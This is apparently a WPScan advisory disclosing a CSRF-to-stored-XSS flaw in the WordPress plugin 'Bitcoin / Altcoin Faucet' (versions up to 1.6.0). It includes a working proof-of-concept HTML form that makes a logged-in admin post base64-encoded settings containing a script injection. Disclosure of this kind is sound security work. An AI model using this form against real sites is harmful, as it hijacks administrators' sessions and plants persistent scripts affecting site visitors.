WordPress Plugin Vulnerabilities
Bitcoin / Altcoin Faucet <= 1.6.0 - Settings Update to Stored XSS via CSRF
Description
The plugin does not have any CSRF check when saving its settings, allowing attacker to make a logged in admin change them via a CSRF attack. Furthermore, due to the lack of sanitisation and escaping, it could also lead to Stored Cross-Site Scripting issues
Proof of Concept
Make a logged in admin open a page containing the HTML code below
<form action="https://example.com/wp-admin/options-general.php?page=bitcoin_faucet" method="POST">
<input type="text" name="encoded_data" value="bmFtZT1CaXRjb2luK0ZhdWNldCZzaG9ydD0lMjIlM0UlM0NzY3JpcHQlM0VhbGVydCglMkZYU1MlMkYpJTNDJTJGc2NyaXB0JTNFJnNlcnZpY2U9Y3J5cHRvbyZhcGlrZXk9JmN1cnJlbmN5PUJUQyZyZWZlcnJhbD0yMCZ0aW1lcj02MCZyZXdhcmRzPTkwKjEwLTIwJTJDKzEwKjEwLTUwJmRlZmF1bHRfY2FwdGNoYT1SYWluQ2FwdGNoYSZjcnlwdG9sb290X3NpdGVfa2V5PSZjcnlwdG9sb290X3NlY3JldF9rZXk9JmNyeXB0b2xvb3RfaGFzaGVzPTUxMiZyYWluY2FwdGNoYV9wdWJsaWNfa2V5PSZyYWluY2FwdGNoYV9zZWNyZXRfa2V5PSZyZWNhcHRjaGFfcHVibGljX2tleT0mcmVjYXB0Y2hhX3ByaXZhdGVfa2V5PSZmdW5jYXB0Y2hhX3B1YmxpY19rZXk9JmZ1bmNhcHRjaGFfcHJpdmF0ZV9rZXk9JnNvbHZlbWVkaWFfY2hhbGxlbmdlX2tleT0mc29sdmVtZWRpYV92ZXJpZmljYXRpb25fa2V5PSZzb2x2ZW1lZGlhX2F1dGhfa2V5PSZ0ZW1wbGF0ZT1kZWZhdWx0JmN1c3RvbV9hZG1pbl9saW5rX2RlZmF1bHQ9dHJ1ZSZjdXN0b21fcGFsZXR0ZV9kZWZhdWx0PWRlZmF1bHQmY3VzdG9tX2JvZHlfYmdfZGVmYXVsdD0mY3VzdG9tX2JvZHlfdHhfZGVmYXVsdD0mY3VzdG9tX2JveF90b3BfYmdfZGVmYXVsdD0mY3VzdG9tX2JveF90b3BfdHhfZGVmYXVsdD0mY3VzdG9tX21haW5fYm94X2JnX2RlZmF1bHQ9JmN1c3RvbV9tYWluX2JveF90eF9kZWZhdWx0PSZjdXN0b21fYm94X2xlZnRfYmdfZGVmYXVsdD0mY3VzdG9tX2JveF9sZWZ0X3R4X2RlZmF1bHQ9JmN1c3RvbV9ib3hfcmlnaHRfYmdfZGVmYXVsdD0mY3VzdG9tX2JveF9yaWdodF90eF9kZWZhdWx0PSZjdXN0b21fYm94X2JvdHRvbV9iZ19kZWZhdWx0PSZjdXN0b21fYm94X2JvdHRvbV90eF9kZWZhdWx0PSZjdXN0b21fZXh0cmFfY29kZV9OT0JPWF9kZWZhdWx0PSUzQ3N0eWxlJTNFJTBEJTBBJTJGKitjdXN0b21fY3NzKyolMkYlMEQlMEElMkYqK2NlbnRlcitldmVyeXRoaW5nISsqJTJGJTBEJTBBLnJvdyslN0IlMEQlMEErKysrdGV4dC1hbGlnbiUzQStjZW50ZXIlM0IlMEQlMEElN0QlMEQlMEElMjNyZWNhcHRjaGFfd2lkZ2V0X2RpdiUyQyslMjNyZWNhcHRjaGFfYXJlYSslN0IlMEQlMEErKysrbWFyZ2luJTNBKzArYXV0byUzQiUwRCUwQSU3RCUwRCUwQSUyRiorZG8rbm90K2NlbnRlcitsaXN0cysqJTJGJTBEJTBBdWwlMkMrb2wrJTdCJTBEJTBBKysrK3RleHQtYWxpZ24lM0ErbGVmdCUzQiUwRCUwQSU3RCslMEQlMEElM0MlMkZzdHlsZSUzRSZjdXN0b21fYm94X3RvcF9kZWZhdWx0PSZjdXN0b21fYm94X2xlZnRfZGVmYXVsdD0mY3VzdG9tX2JveF9yaWdodF9kZWZhdWx0PSZjdXN0b21fYm94X2JvdHRvbV9kZWZhdWx0PSZibG9ja19hZGJsb2NrPW9uJmhvc3RuYW1lX2Jhbl9saXN0PSZhc25fYmFuX2xpc3Q9JmNvdW50cnlfYmFuX2xpc3Q9JmlwX2Jhbl9saXN0PSZhZGRyZXNzX2Jhbl9saXN0PSZpcF93aGl0ZV9saXN0PSZyZXZlcnNlX3Byb3h5PW9uJnRyb2ZfcmV3YXJkc192aWV3X21vZGU9cmFuZ2UmdHJvZl9oaWRlX2ZhdWNldF9iYWxhbmNlPW5vJmJ1dHRvbl90aW1lcj01JnNlbmRfY29pbnNfYW1vdW50PTEmc2VuZF9jb2luc19hZGRyZXNzPQ%3D%3D">
<input type="text" name="save_settings" value="Save Changes">
<input type="submit" name="submit" value="submit">
</form>
The XSS (payload is in the short parameter of the base64 encoded data above) will be triggered when viewing the settings again, as well as in the frontend page/post where the [WPBF] shortcode is embed
Affects Plugins
No known fix References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Lana Codes
Submitter
Lana Codes
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-08-31 (about 1 years ago)
Added
2022-08-31 (about 1 years ago)
Last Updated
2022-08-31 (about 1 years ago)
WPScan 